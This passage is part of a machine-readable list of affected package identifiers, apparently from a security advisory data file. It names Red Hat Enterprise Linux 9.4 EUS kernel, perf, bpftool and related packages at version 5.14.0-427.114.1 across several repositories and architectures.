"AppStream-9.4.0.Z.EUS:kernel-rt-debuginfo-0:5.14.0-427.114.1.el9_4.aarch64",
"AppStream-9.4.0.Z.EUS:kernel-rt-debuginfo-0:5.14.0-427.114.1.el9_4.x86_64",
"AppStream-9.4.0.Z.EUS:kernel-rt-devel-0:5.14.0-427.114.1.el9_4.x86_64",
"AppStream-9.4.0.Z.EUS:kernel-rt-kvm-0:5.14.0-427.114.1.el9_4.x86_64",
"AppStream-9.4.0.Z.EUS:kernel-rt-modules-0:5.14.0-427.114.1.el9_4.x86_64",
"AppStream-9.4.0.Z.EUS:kernel-rt-modules-core-0:5.14.0-427.114.1.el9_4.x86_64",
"AppStream-9.4.0.Z.EUS:kernel-rt-modules-extra-0:5.14.0-427.114.1.el9_4.x86_64",
"AppStream-9.4.0.Z.EUS:kernel-tools-0:5.14.0-427.114.1.el9_4.aarch64",
"AppStream-9.4.0.Z.EUS:kernel-tools-0:5.14.0-427.114.1.el9_4.ppc64le",
"AppStream-9.4.0.Z.EUS:kernel-tools-0:5.14.0-427.114.1.el9_4.s390x",
"AppStream-9.4.0.Z.EUS:kernel-tools-0:5.14.0-427.114.1.el9_4.x86_64",
"AppStream-9.4.0.Z.EUS:kernel-tools-debuginfo-0:5.14.0-427.114.1.el9_4.aarch64",
"AppStream-9.4.0.Z.EUS:kernel-tools-debuginfo-0:5.14.0-427.114.1.el9_4.ppc64le",
"AppStream-9.4.0.Z.EUS:kernel-tools-debuginfo-0:5.14.0-427.114.1.el9_4.s390x",
"AppStream-9.4.0.Z.EUS:kernel-tools-debuginfo-0:5.14.0-427.114.1.el9_4.x86_64",
"AppStream-9.4.0.Z.EUS:kernel-tools-libs-0:5.14.0-427.114.1.el9_4.aarch64",
"AppStream-9.4.0.Z.EUS:kernel-tools-libs-0:5.14.0-427.114.1.el9_4.ppc64le",
"AppStream-9.4.0.Z.EUS:kernel-tools-libs-0:5.14.0-427.114.1.el9_4.x86_64",
"AppStream-9.4.0.Z.EUS:kernel-tools-libs-devel-0:5.14.0-427.114.1.el9_4.aarch64",
"AppStream-9.4.0.Z.EUS:kernel-tools-libs-devel-0:5.14.0-427.114.1.el9_4.ppc64le",
"AppStream-9.4.0.Z.EUS:kernel-tools-libs-devel-0:5.14.0-427.114.1.el9_4.x86_64",
"AppStream-9.4.0.Z.EUS:kernel-uki-virt-0:5.14.0-427.114.1.el9_4.x86_64",
"AppStream-9.4.0.Z.EUS:kernel-zfcpdump-0:5.14.0-427.114.1.el9_4.s390x",
"AppStream-9.4.0.Z.EUS:kernel-zfcpdump-core-0:5.14.0-427.114.1.el9_4.s390x",
"AppStream-9.4.0.Z.EUS:kernel-zfcpdump-debuginfo-0:5.14.0-427.114.1.el9_4.s390x",
"AppStream-9.4.0.Z.EUS:kernel-zfcpdump-devel-0:5.14.0-427.114.1.el9_4.s390x",
"AppStream-9.4.0.Z.EUS:kernel-zfcpdump-devel-matched-0:5.14.0-427.114.1.el9_4.s390x",
"AppStream-9.4.0.Z.EUS:kernel-zfcpdump-modules-0:5.14.0-427.114.1.el9_4.s390x",
"AppStream-9.4.0.Z.EUS:kernel-zfcpdump-modules-core-0:5.14.0-427.114.1.el9_4.s390x",
"AppStream-9.4.0.Z.EUS:kernel-zfcpdump-modules-extra-0:5.14.0-427.114.1.el9_4.s390x",
"AppStream-9.4.0.Z.EUS:libperf-0:5.14.0-427.114.1.el9_4.aarch64",
"AppStream-9.4.0.Z.EUS:libperf-0:5.14.0-427.114.1.el9_4.ppc64le",
"AppStream-9.4.0.Z.EUS:libperf-0:5.14.0-427.114.1.el9_4.s390x",
"AppStream-9.4.0.Z.EUS:libperf-0:5.14.0-427.114.1.el9_4.x86_64",
"AppStream-9.4.0.Z.EUS:libperf-debuginfo-0:5.14.0-427.114.1.el9_4.aarch64",
"AppStream-9.4.0.Z.EUS:libperf-debuginfo-0:5.14.0-427.114.1.el9_4.ppc64le",
"AppStream-9.4.0.Z.EUS:libperf-debuginfo-0:5.14.0-427.114.1.el9_4.s390x",
"AppStream-9.4.0.Z.EUS:libperf-debuginfo-0:5.14.0-427.114.1.el9_4.x86_64",
"AppStream-9.4.0.Z.EUS:perf-0:5.14.0-427.114.1.el9_4.aarch64",
"AppStream-9.4.0.Z.EUS:perf-0:5.14.0-427.114.1.el9_4.ppc64le",
"AppStream-9.4.0.Z.EUS:perf-0:5.14.0-427.114.1.el9_4.s390x",
"AppStream-9.4.0.Z.EUS:perf-0:5.14.0-427.114.1.el9_4.x86_64",
"AppStream-9.4.0.Z.EUS:perf-debuginfo-0:5.14.0-427.114.1.el9_4.aarch64",
"AppStream-9.4.0.Z.EUS:perf-debuginfo-0:5.14.0-427.114.1.el9_4.ppc64le",
"AppStream-9.4.0.Z.EUS:perf-debuginfo-0:5.14.0-427.114.1.el9_4.s390x",
"AppStream-9.4.0.Z.EUS:perf-debuginfo-0:5.14.0-427.114.1.el9_4.x86_64",
"AppStream-9.4.0.Z.EUS:python3-perf-0:5.14.0-427.114.1.el9_4.aarch64",
"AppStream-9.4.0.Z.EUS:python3-perf-0:5.14.0-427.114.1.el9_4.ppc64le",
"AppStream-9.4.0.Z.EUS:python3-perf-0:5.14.0-427.114.1.el9_4.s390x",
"AppStream-9.4.0.Z.EUS:python3-perf-0:5.14.0-427.114.1.el9_4.x86_64",
"AppStream-9.4.0.Z.EUS:python3-perf-debuginfo-0:5.14.0-427.114.1.el9_4.aarch64",
"AppStream-9.4.0.Z.EUS:python3-perf-debuginfo-0:5.14.0-427.114.1.el9_4.ppc64le",
"AppStream-9.4.0.Z.EUS:python3-perf-debuginfo-0:5.14.0-427.114.1.el9_4.s390x",
"AppStream-9.4.0.Z.EUS:python3-perf-debuginfo-0:5.14.0-427.114.1.el9_4.x86_64",
"AppStream-9.4.0.Z.EUS:rtla-0:5.14.0-427.114.1.el9_4.aarch64",
"AppStream-9.4.0.Z.EUS:rtla-0:5.14.0-427.114.1.el9_4.ppc64le",
"AppStream-9.4.0.Z.EUS:rtla-0:5.14.0-427.114.1.el9_4.s390x",
"AppStream-9.4.0.Z.EUS:rtla-0:5.14.0-427.114.1.el9_4.x86_64",
"AppStream-9.4.0.Z.EUS:rv-0:5.14.0-427.114.1.el9_4.aarch64",
"AppStream-9.4.0.Z.EUS:rv-0:5.14.0-427.114.1.el9_4.ppc64le",
"AppStream-9.4.0.Z.EUS:rv-0:5.14.0-427.114.1.el9_4.s390x",
"AppStream-9.4.0.Z.EUS:rv-0:5.14.0-427.114.1.el9_4.x86_64",
"BaseOS-9.4.0.Z.EUS:bpftool-0:7.3.0-427.114.1.el9_4.aarch64",
"BaseOS-9.4.0.Z.EUS:bpftool-0:7.3.0-427.114.1.el9_4.ppc64le",
"BaseOS-9.4.0.Z.EUS:bpftool-0:7.3.0-427.114.1.el9_4.s390x",
"BaseOS-9.4.0.Z.EUS:bpftool-0:7.3.0-427.114.1.el9_4.x86_64",
"BaseOS-9.4.0.Z.EUS:bpftool-debuginfo-0:7.3.0-427.114.1.el9_4.aarch64",
"BaseOS-9.4.0.Z.EUS:bpftool-debuginfo-0:7.3.0-427.114.1.el9_4.ppc64le",
"BaseOS-9.4.0.Z.EUS:bpftool-debuginfo-0:7.3.0-427.114.1.el9_4.s390x",
"BaseOS-9.4.0.Z.EUS:bpftool-debuginfo-0:7.3.0-427.114.1.el9_4.x86_64",
"BaseOS-9.4.0.Z.EUS:kernel-0:5.14.0-427.114.1.el9_4.aarch64",
"BaseOS-9.4.0.Z.EUS:kernel-0:5.14.0-427.114.1.el9_4.ppc64le",
"BaseOS-9.4.0.Z.EUS:kernel-0:5.14.0-427.114.1.el9_4.s390x",
"BaseOS-9.4.0.Z.EUS:kernel-0:5.14.0-427.114.1.el9_4.src",
"BaseOS-9.4.0.Z.EUS:kernel-0:5.14.0-427.114.1.el9_4.x86_64",
"BaseOS-9.4.0.Z.EUS:kernel-64k-0:5.14.0-427.114.1.el9_4.aarch64",
"BaseOS-9.4.0.Z.EUS:kernel-64k-core-0:5.14.0-427.114.1.el9_4.aarch64",
"BaseOS-9.4.0.Z.EUS:kernel-64k-debug-0:5.14.0-427.114.1.el9_4.aarch64",
"BaseOS-9.4.0.Z.EUS:kernel-64k-debug-core-0:5.14.0-427.114.1.el9_4.aarch64",
"BaseOS-9.4.0.Z.EUS:kernel-64k-debug-debuginfo-0:5.14.0-427.114.1.el9_4.aarch64",
"BaseOS-9.4.0.Z.EUS:kernel-64k-debug-devel-0:5.14.0-427.114.1.el9_4.aarch64",
"BaseOS-9.4.0.Z.EUS:kernel-64k-debug-devel-matched-0:5.14.0-427.114.1.el9_4.aarch64",
"BaseOS-9.4.0.Z.EUS:kernel-64k-debug-modules-0:5.14.0-427.114.1.el9_4.aarch64",
"BaseOS-9.4.0.Z.EUS:kernel-64k-debug-modules-core-0:5.14.0-427.114.1.el9_4.aarch64",
"BaseOS-9.4.0.Z.EUS:kernel-64k-debug-modules-extra-0:5.14.0-427.114.1.el9_4.aarch64",
"BaseOS-9.4.0.Z.EUS:kernel-64k-debuginfo-0:5.14.0-427.114.1.el9_4.aarch64",
"BaseOS-9.4.0.Z.EUS:kernel-64k-devel-0:5.14.0-427.114.1.el9_4.aarch64",
"BaseOS-9.4.0.Z.EUS:kernel-64k-devel-matched-0:5.14.0-427.114.1.el9_4.aarch64",
"BaseOS-9.4.0.Z.EUS:kernel-64k-modules-0:5.14.0-427.114.1.el9_4.aarch64",
"BaseOS-9.4.0.Z.EUS:kernel-64k-modules-core-0:5.14.0-427.114.1.el9_4.aarch64",
"BaseOS-9.4.0.Z.EUS:kernel-64k-modules-extra-0:5.14.0-427.114.1.el9_4.aarch64",
"BaseOS-9.4.0.Z.EUS:kernel-abi-stablelists-0:5.14.0-427.114.1.el9_4.noarch",
"BaseOS-9.4.0.Z.EUS:kernel-core-0:5.14.0-427.114.1.el9_4.aarch64",
"BaseOS-9.4.0.Z.EUS:kernel-core-0:5.14.0-427.114.1.el9_4.ppc64le",
"BaseOS-9.4.0.Z.EUS:kernel-core-0:5.14.0-427.114.1.el9_4.s390x",
"BaseOS-9.4.0.Z.EUS:kernel-core-0:5.14.0-427.114.1.el9_4.x86_64",
"BaseOS-9.4.0.Z.EUS:kernel-debug-0:5.14.0-427.114.1.el9_4.aarch64",
"BaseOS-9.4.0.Z.EUS:kernel-debug-0:5.14.0-427.114.1.el9_4.ppc64le",
"BaseOS-9.4.0.Z.EUS:kernel-debug-0:5.14.0-427.114.1.el9_4.s390x",
"BaseOS-9.4.0.Z.EUS:kernel-debug-0:5.14.0-427.114.1.el9_4.x86_64",
"BaseOS-9.4.0.Z.EUS:kernel-debug-core-0:5.14.0-427.114.1.el9_4.aarch64",
"BaseOS-9.4.0.Z.EUS:kernel-debug-core-0:5.14.0-427.114.1.el9_4.ppc64le",
"BaseOS-9.4.0.Z.EUS:kernel-debug-core-0:5.14.0-427.114.1.el9_4.s390x",
"BaseOS-9.4.0.Z.EUS:kernel-debug-core-0:5.14.0-427.114.1.el9_4.x86_64",
"BaseOS-9.4.0.Z.EUS:kernel-debug-debuginfo-0:5.14.0-427.114.1.el9_4.aarch64",
"BaseOS-9.4.0.Z.EUS:kernel-debug-debuginfo-0:5.14.0-427.114.1.el9_4.ppc64le",
"BaseOS-9.4.0.Z.EUS:kernel-debug-debuginfo-0:5.14.0-427.114.1.el9_4.s390x",
"BaseOS-9.4.0.Z.EUS:kernel-debug-debuginfo-0:5.14.0-427.114.1.el9_4.x86_64",
"BaseOS-9.4.0.Z.EUS:kernel-debug-devel-0:5.14.0-427.114.1.el9_4.aarch64",
"BaseOS-9.4.0.Z.EUS:kernel-debug-devel-0:5.14.0-427.114.1.el9_4.ppc64le",
"BaseOS-9.4.0.Z.EUS:kernel-debug-devel-0:5.14.0-427.114.1.el9_4.s390x",
"BaseOS-9.4.0.Z.EUS:kernel-debug-devel-0:5.14.0-427.114.1.el9_4.x86_64",
"BaseOS-9.4.0.Z.EUS:kernel-debug-devel-matched-0:5.14.0-427.114.1.el9_4.aarch64",
"BaseOS-9.4.0.Z.EUS:kernel-debug-devel-matched-0:5.14.0-427.114.1.el9_4.ppc64le",
"BaseOS-9.4.0.Z.EUS:kernel-debug-devel-matched-0:5.14.0-427.114.1.el9_4.s390x",
"BaseOS-9.4.0.Z.EUS:kernel-debug-devel-matched-0:5.14.0-427.114.1.el9_4.x86_64",
"BaseOS-9.4.0.Z.EUS:kernel-debug-modules-0:5.14.0-427.114.1.el9_4.aarch64",
"BaseOS-9.4.0.Z.EUS:kernel-debug-modules-0:5.14.0-427.114.1.el9_4.ppc64le",
"BaseOS-9.4.0.Z.EUS:kernel-debug-modules-0:5.14.0-427.114.1.el9_4.s390x",
"BaseOS-9.4.0.Z.EUS:kernel-debug-modules-0:5.14.0-427.114.1.el9_4.x86_64",
"BaseOS-9.4.0.Z.EUS:kernel-debug-modules-core-0:5.14.0-427.114.1.el9_4.aarch64",
"BaseOS-9.4.0.Z.EUS:kernel-debug-modules-core-0:5.14.0-427.114.1.el9_4.ppc64le",
"BaseOS-9.4.0.Z.EUS:kernel-debug-modules-core-0:5.14.0-427.114.1.el9_4.s390x",
"BaseOS-9.4.0.Z.EUS:kernel-debug-modules-core-0:5.14.0-427.114.1.el9_4.x86_64",
"BaseOS-9.4.0.Z.EUS:kernel-debug-modules-extra-0:5.14.0-427.114.1.el9_4.aarch64",
"BaseOS-9.4.0.Z.EUS:kernel-debug-modules-extra-0:5.14.0-427.114.1.el9_4.ppc64le",
"BaseOS-9.4.0.Z.EUS:kernel-debug-modules-extra-0:5.14.0-427.114.1.el9_4.s390x",
"BaseOS-9.4.0.Z.EUS:kernel-debug-modules-extra-0:5.14.0-427.114.1.el9_4.x86_64",
"BaseOS-9.4.0.Z.EUS:kernel-debug-uki-virt-0:5.14.0-427.114.1.el9_4.x86_64",
"BaseOS-9.4.0.Z.EUS:kernel-debuginfo-0:5.14.0-427.114.1.el9_4.aarch64",
"BaseOS-9.4.0.Z.EUS:kernel-debuginfo-0:5.14.0-427.114.1.el9_4.ppc64le",
"BaseOS-9.4.0.Z.EUS:kernel-debuginfo-0:5.14.0-427.114.1.el9_4.s390x",
"BaseOS-9.4.0.Z.EUS:kernel-debuginfo-0:5.14.0-427.114.1.el9_4.x86_64",
"BaseOS-9.4.0.Z.EUS:kernel-debuginfo-common-aarch64-0:5.14.0-427.114.1.el9_4.aarch64",
"BaseOS-9.4.0.Z.EUS:kernel-debuginfo-common-ppc64le-0:5.14.0-427.114.1.el9_4.ppc64le",
"BaseOS-9.4.0.Z.EUS:kernel-debuginfo-common-s390x-0:5.14.0-427.114.1.el9_4.s390x",
"BaseOS-9.4.0.Z.EUS:kernel-debuginfo-common-x86_64-0:5.14.0-427.114.1.el9_4.x86_64",
"BaseOS-9.4.0.Z.EUS:kernel-devel-0:5.14.0-427.114.1.el9_4.aarch64",
"BaseOS-9.4.0.Z.EUS:kernel-devel-0:5.14.0-427.114.1.el9_4.ppc64le",
"BaseOS-9.4.0.Z.EUS:kernel-devel-0:5.14.0-427.114.1.el9_4.s390x",
"BaseOS-9.4.0.Z.EUS:kernel-devel-0:5.14.0-427.114.1.el9_4.x86_64",
"BaseOS-9.4.0.Z.EUS:kernel-devel-matched-0:5.14.0-427.114.1.el9_4.aarch64",
"BaseOS-9.4.0.Z.EUS:kernel-devel-matched-0:5.14.0-427.114.1.el9_4.ppc64le",
"BaseOS-9.4.0.Z.EUS:kernel-devel-matched-0:5.14.0-427.114.1.el9_4.s390x",
"BaseOS-9.4.0.Z.EUS:kernel-devel-matched-0:5.14.0-427.114.1.el9_4.x86_64",
"BaseOS-9.4.0.Z.EUS:kernel-doc-0:5.14.0-427.114.1.el9_4.noarch",
"BaseOS-9.4.0.Z.EUS:kernel-modules-0:5.14.0-427.114.1.el9_4.aarch64",
"BaseOS-9.4.0.Z.EUS:kernel-modules-0:5.14.0-427.114.1.el9_4.ppc64le",
"BaseOS-9.4.0.Z.EUS:kernel-modules-0:5.14.0-427.114.1.el9_4.s390x",
"BaseOS-9.4.0.Z.EUS:kernel-modules-0:5.14.0-427.114.1.el9_4.x86_64",
"BaseOS-9.4.0.Z.EUS:kernel-modules-core-0:5.14.0-427.114.1.el9_4.aarch64",
"BaseOS-9.4.0.Z.EUS:kernel-modules-core-0:5.14.0-427.114.1.el9_4.ppc64le",
"BaseOS-9.4.0.Z.EUS:kernel-modules-core-0:5.14.0-427.114.1.el9_4.s390x",
"BaseOS-9.4.0.Z.EUS:kernel-modules-core-0:5.14.0-427.114.1.el9_4.x86_64",
"BaseOS-9.4.0.Z.EUS:kernel-modules-extra-0:5.14.0-427.114.1.el9_4.aarch64",
"BaseOS-9.4.0.Z.EUS:kernel-modules-extra-0:5.14.0-427.114.1.el9_4.ppc64le",
"BaseOS-9.4.0.Z.EUS:kernel-modules-extra-0:5.14.0-427.114.1.el9_4.s390x",
"BaseOS-9.4.0.Z.EUS:kernel-modules-extra-0:5.14.0-427.114.1.el9_4.x86_64",
"BaseOS-9.4.0.Z.EUS:kernel-rt-0:5.14.0-427.114.1.el9_4.x86_64",
"BaseOS-9.4.0.Z.EUS:kernel-rt-core-0:5.14.0-427.114.1.el9_4.x86_64",
"BaseOS-9.4.0.Z.EUS:kernel-rt-debug-0:5.14.0-427.114.1.el9_4.x86_64",
"BaseOS-9.4.0.Z.EUS:kernel-rt-debug-core-0:5.14.0-427.114.1.el9_4.x86_64",
"BaseOS-9.4.0.Z.EUS:kernel-rt-debug-debuginfo-0:5.14.0-427.114.1.el9_4.aarch64",
"BaseOS-9.4.0.Z.EUS:kernel-rt-debug-debuginfo-0:5.14.0-427.114.1.el9_4.x86_64",
"BaseOS-9.4.0.Z.EUS:kernel-rt-debug-devel-0:5.14.0-427.114.1.el9_4.x86_64",
"BaseOS-9.4.0.Z.EUS:kernel-rt-debug-kvm-0:5.14.0-427.114.1.el9_4.x86_64",
"BaseOS-9.4.0.Z.EUS:kernel-rt-debug-modules-0:5.14.0-427.114.1.el9_4.x86_64",
"BaseOS-9.4.0.Z.EUS:kernel-rt-debug-modules-core-0:5.14.0-427.114.1.el9_4.x86_64",
"BaseOS-9.4.0.Z.EUS:kernel-rt-debug-modules-extra-0:5.14.0-427.114.1.el9_4.x86_64",
"BaseOS-9.4.0.Z.EUS:kernel-rt-debuginfo-0:5.14.0-427.114.1.el9_4.aarch64",
"BaseOS-9.4.0.Z.EUS:kernel-rt-debuginfo-0:5.14.0-427.114.1.el9_4.x86_64",
"BaseOS-9.4.0.Z.EUS:kernel-rt-devel-0:5.14.0-427.114.1.el9_4.x86_64",
"BaseOS-9.4.0.Z.EUS:kernel-rt-kvm-0:5.14.0-427.114.1.el9_4.x86_64",
"BaseOS-9.4.0.Z.EUS:kernel-rt-modules-0:5.14.0-427.114.1.el9_4.x86_64",
"BaseOS-9.4.0.Z.EUS:kernel-rt-modules-core-0:5.14.0-427.114.1.el9_4.x86_64",
"BaseOS-9.4.0.Z.EUS:kernel-rt-modules-extra-0:5.14.0-427.114.1.el9_4.x86_64",
"BaseOS-9.4.0.Z.EUS:kernel-tools-0:5.14.0-427.114.1.el9_4.aarch64",
"BaseOS-9.4.0.Z.EUS:kernel-tools-0:5.14.0-427.114.1.el9_4.ppc64le",
"BaseOS-9.4.0.Z.EUS:kernel-tools-0:5.14.0-427.114.1.el9_4.s390x",
"BaseOS-9.4.0.Z.EUS:kernel-tools-0:5.14.0-427.114.1.el9_4.x86_64",
"BaseOS-9.4.0.Z.EUS:kernel-tools-debuginfo-0:5.14.0-427.114.1.el9_4.aarch64",
"BaseOS-9.4.0.Z.EUS:kernel-tools-debuginfo-0:5.14.0-427.114.1.el9_4.ppc64le",
"BaseOS-9.4.0.Z.EUS:kernel-tools-debuginfo-0:5.14.0-427.114.1.el9_4.s390x",
"BaseOS-9.4.0.Z.EUS:kernel-tools-debuginfo-0:5.14.0-427.114.1.el9_4.x86_64",
"BaseOS-9.4.0.Z.EUS:kernel-tools-libs-0:5.14.0-427.114.1.el9_4.aarch64",
"BaseOS-9.4.0.Z.EUS:kernel-tools-libs-0:5.14.0-427.114.1.el9_4.ppc64le",
"BaseOS-9.4.0.Z.EUS:kernel-tools-libs-0:5.14.0-427.114.1.el9_4.x86_64",
"BaseOS-9.4.0.Z.EUS:kernel-tools-libs-devel-0:5.14.0-427.114.1.el9_4.aarch64",
"BaseOS-9.4.0.Z.EUS:kernel-tools-libs-devel-0:5.14.0-427.114.1.el9_4.ppc64le",
"BaseOS-9.4.0.Z.EUS:kernel-tools-libs-devel-0:5.14.0-427.114.1.el9_4.x86_64",
"BaseOS-9.4.0.Z.EUS:kernel-uki-virt-0:5.14.0-427.114.1.el9_4.x86_64",
"BaseOS-9.4.0.Z.EUS:kernel-zfcpdump-0:5.14.0-427.114.1.el9_4.s390x",
"BaseOS-9.4.0.Z.EUS:kernel-zfcpdump-core-0:5.14.0-427.114.1.el9_4.s390x",
"BaseOS-9.4.0.Z.EUS:kernel-zfcpdump-debuginfo-0:5.14.0-427.114.1.el9_4.s390x",
"BaseOS-9.4.0.Z.EUS:kernel-zfcpdump-devel-0:5.14.0-427.114.1.el9_4.s390x",
"BaseOS-9.4.0.Z.EUS:kernel-zfcpdump-devel-matched-0:5.14.0-427.114.1.el9_4.s390x",
"BaseOS-9.4.0.Z.EUS:kernel-zfcpdump-modules-0:5.14.0-427.114.1.el9_4.s390x",
"BaseOS-9.4.0.Z.EUS:kernel-zfcpdump-modules-core-0:5.14.0-427.114.1.el9_4.s390x",
"BaseOS-9.4.0.Z.EUS:kernel-zfcpdump-modules-extra-0:5.14.0-427.114.1.el9_4.s390x",
"BaseOS-9.4.0.Z.EUS:libperf-0:5.14.0-427.114.1.el9_4.aarch64",
"BaseOS-9.4.0.Z.EUS:libperf-0:5.14.0-427.114.1.el9_4.ppc64le",
"BaseOS-9.4.0.Z.EUS:libperf-0:5.14.0-427.114.1.el9_4.s390x",
"BaseOS-9.4.0.Z.EUS:libperf-0:5.14.0-427.114.1.el9_4.x86_64",
"BaseOS-9.4.0.Z.EUS:libperf-debuginfo-0:5.14.0-427.114.1.el9_4.aarch64",
"BaseOS-9.4.0.Z.EUS:libperf-debuginfo-0:5.14.0-427.114.1.el9_4.ppc64le",
"BaseOS-9.4.0.Z.EUS:libperf-debuginfo-0:5.14.0-427.114.1.el9_4.s390x",
"BaseOS-9.4.0.Z.EUS:libperf-debuginfo-0:5.14.0-427.114.1.el9_4.x86_64",
"BaseOS-9.4.0.Z.EUS:perf-0:5.14.0-427.114.1.el9_4.aarch64",
"BaseOS-9.4.0.Z.EUS:perf-0:5.14.0-427.114.1.el9_4.ppc64le",
"BaseOS-9.4.0.Z.EUS:perf-0:5.14.0-427.114.1.el9_4.s390x",
"BaseOS-9.4.0.Z.EUS:perf-0:5.14.0-427.114.1.el9_4.x86_64",
"BaseOS-9.4.0.Z.EUS:perf-debuginfo-0:5.14.0-427.114.1.el9_4.aarch64",
"BaseOS-9.4.0.Z.EUS:perf-debuginfo-0:5.14.0-427.114.1.el9_4.ppc64le",
"BaseOS-9.4.0.Z.EUS:perf-debuginfo-0:5.14.0-427.114.1.el9_4.s390x",
"BaseOS-9.4.0.Z.EUS:perf-debuginfo-0:5.14.0-427.114.1.el9_4.x86_64",
"BaseOS-9.4.0.Z.EUS:python3-perf-0:5.14.0-427.114.1.el9_4.aarch64",
"BaseOS-9.4.0.Z.EUS:python3-perf-0:5.14.0-427.114.1.el9_4.ppc64le",
"BaseOS-9.4.0.Z.EUS:python3-perf-0:5.14.0-427.114.1.el9_4.s390x",
"BaseOS-9.4.0.Z.EUS:python3-perf-0:5.14.0-427.114.1.el9_4.x86_64",
"BaseOS-9.4.0.Z.EUS:python3-perf-debuginfo-0:5.14.0-427.114.1.el9_4.aarch64",
"BaseOS-9.4.0.Z.EUS:python3-perf-debuginfo-0:5.14.0-427.114.1.el9_4.ppc64le",
"BaseOS-9.4.0.Z.EUS:python3-perf-debuginfo-0:5.14.0-427.114.1.el9_4.s390x",
"BaseOS-9.4.0.Z.EUS:python3-perf-debuginfo-0:5.14.0-427.114.1.el9_4.x86_64",
"BaseOS-9.4.0.Z.EUS:rtla-0:5.14.0-427.114.1.el9_4.aarch64",
"BaseOS-9.4.0.Z.EUS:rtla-0:5.14.0-427.114.1.el9_4.ppc64le",
"BaseOS-9.4.0.Z.EUS:rtla-0:5.14.0-427.114.1.el9_4.s390x",
"BaseOS-9.4.0.Z.EUS:rtla-0:5.14.0-427.114.1.el9_4.x86_64",
"BaseOS-9.4.0.Z.EUS:rv-0:5.14.0-427.114.1.el9_4.aarch64",
"BaseOS-9.4.0.Z.EUS:rv-0:5.14.0-427.114.1.el9_4.ppc64le",
"BaseOS-9.4.0.Z.EUS:rv-0:5.14.0-427.114.1.el9_4.s390x",
"BaseOS-9.4.0.Z.EUS:rv-0:5.14.0-427.114.1.el9_4.x86_64",
"CRB-9.4.0.Z.EUS:bpftool-0:7.3.0-427.114.1.el9_4.aarch64",
"CRB-9.4.0.Z.EUS:bpftool-0:7.3.0-427.114.1.el9_4.ppc64le",
"CRB-9.4.0.Z.EUS:bpftool-0:7.3.0-427.114.1.el9_4.s390x",
"CRB-9.4.0.Z.EUS:bpftool-0:7.3.0-427.114.1.el9_4.x86_64",
"CRB-9.4.0.Z.EUS:bpftool-debuginfo-0:7.3.0-427.114.1.el9_4.aarch64",
"CRB-9.4.0.Z.EUS:bpftool-debuginfo-0:7.3.0-427.114.1.el9_4.ppc64le",
"CRB-9.4.0.Z.EUS:bpftool-debuginfo-0:7.3.0-427.114.1.el9_4.s390x",
"CRB-9.4.0.Z.EUS:bpftool-debuginfo-0:7.3.0-427.114.1.el9_4.x86_64",
"CRB-9.4.0.Z.EUS:kernel-0:5.14.0-427.114.1.el9_4.aarch64",
"CRB-9.4.0.Z.EUS:kernel-0:5.14.0-427.114.1.el9_4.ppc64le",
"CRB-9.4.0.Z.EUS:kernel-0:5.14.0-427.114.1.el9_4.s390x",
"CRB-9.4.0.Z.EUS:kernel-0:5.14.0-427.114.1.el9_4.src",
"CRB-9.4.0.Z.EUS:kernel-0:5.14.0-427.114.1.el9_4.x86_64",
"CRB-9.4.0.Z.EUS:kernel-64k-0:5.14.0-427.114.1.el9_4.aarch64",
"CRB-9.4.0.Z.EUS:kernel-64k-core-0:5.14.0-427.114.1.el9_4.aarch64",
"CRB-9.4.0.Z.EUS:kernel-64k-debug-0:5.14.0-427.114.1.el9_4.aarch64",
"CRB-9.4.0.Z.EUS:kernel-64k-debug-core-0:5.14.0-427.114.1.el9_4.aarch64",
"CRB-9.4.0.Z.EUS:kernel-64k-debug-debuginfo-0:5.14.0-427.114.1.el9_4.aarch64",
"CRB-9.4.0.Z.EUS:kernel-64k-debug-devel-0:5.14.0-427.114.1.el9_4.aarch64",
"CRB-9.4.0.Z.EUS:kernel-64k-debug-devel-matched-0:5.14.0-427.114.1.el9_4.aarch64",
"CRB-9.4.0.Z.EUS:kernel-64k-debug-modules-0:5.14.0-427.114.1.el9_4.aarch64",
"CRB-9.4.0.Z.EUS:kernel-64k-debug-modules-core-0:5.14.0-427.114.1.el9_4.aarch64",
"CRB-9.4.0.Z.EUS:kernel-64k-debug-modules-extra-0:5.14.0-427.114.1.el9_4.aarch64",
"CRB-9.4.0.Z.EUS:kernel-64k-debuginfo-0:5.14.0-427.114.1.el9_4.aarch64",
"CRB-9.4.0.Z.EUS:kernel-64k-devel-0:5.14.0-427.114.1.el9_4.aarch64",
"CRB-9.4.0.Z.EUS:kernel-64k-devel-matched-0:5.14.0-427.114.1.el9_4.aarch64",
"CRB-9.4.0.Z.EUS:kernel-64k-modules-0:5.14.0-427.114.1.el9_4.aarch64",
"CRB-9.4.0.Z.EUS:kernel-64k-modules-core-0:5.14.0-427.114.1.el9_4.aarch64",
"CRB-9.4.0.Z.EUS:kernel-64k-modules-extra-0:5.14.0-427.114.1.el9_4.aarch64",
"CRB-9.4.0.Z.EUS:kernel-abi-stablelists-0:5.14.0-427.114.1.el9_4.noarch",
"CRB-9.4.0.Z.EUS:kernel-core-0:5.14.0-427.114.1.el9_4.aarch64",
"CRB-9.4.0.Z.EUS:kernel-core-0:5.14.0-427.114.1.el9_4.ppc64le",
"CRB-9.4.0.Z.EUS:kernel-core-0:5.14.0-427.114.1.el9_4.s390x",
"CRB-9.4.0.Z.EUS:kernel-core-0:5.14.0-427.114.1.el9_4.x86_64",
"CRB-9.4.0.Z.EUS:kernel-debug-0:5.14.0-427.114.1.el9_4.aarch64",
"CRB-9.4.0.Z.EUS:kernel-debug-0:5.14.0-427.114.1.el9_4.ppc64le",
"CRB-9.4.0.Z.EUS:kernel-debug-0:5.14.0-427.114.1.el9_4.s390x",
"CRB-9.4.0.Z.EUS:kernel-debug-0:5.14.0-427.114.1.el9_4.x86_64",
"CRB-9.4.0.Z.EUS:kernel-debug-core-0:5.14.0-427.114.1.el9_4.aarch64",
"CRB-9.4.0.Z.EUS:kernel-debug-core-0:5.14.0-427.114.1.el9_4.ppc64le",
"CRB-9.4.0.Z.EUS:kernel-debug-core-0:5.14.0-427.114.1.el9_4.s390x",
"CRB-9.4.0.Z.EUS:kernel-debug-core-0:5.14.0-427.114.1.el9_4.x86_64",
"CRB-9.4.0.Z.EUS:kernel-debug-debuginfo-0:5.14.0-427.114.1.el9_4.aarch64",
"CRB-9.4.0.Z.EUS:kernel-debug-debuginfo-0:5.14.0-427.114.1.el9_4.ppc64le",
"CRB-9.4.0.Z.EUS:kernel-debug-debuginfo-0:5.14.0-427.114.1.el9_4.s390x",
"CRB-9.4.0.Z.EUS:kernel-debug-debuginfo-0:5.14.0-427.114.1.el9_4.x86_64",
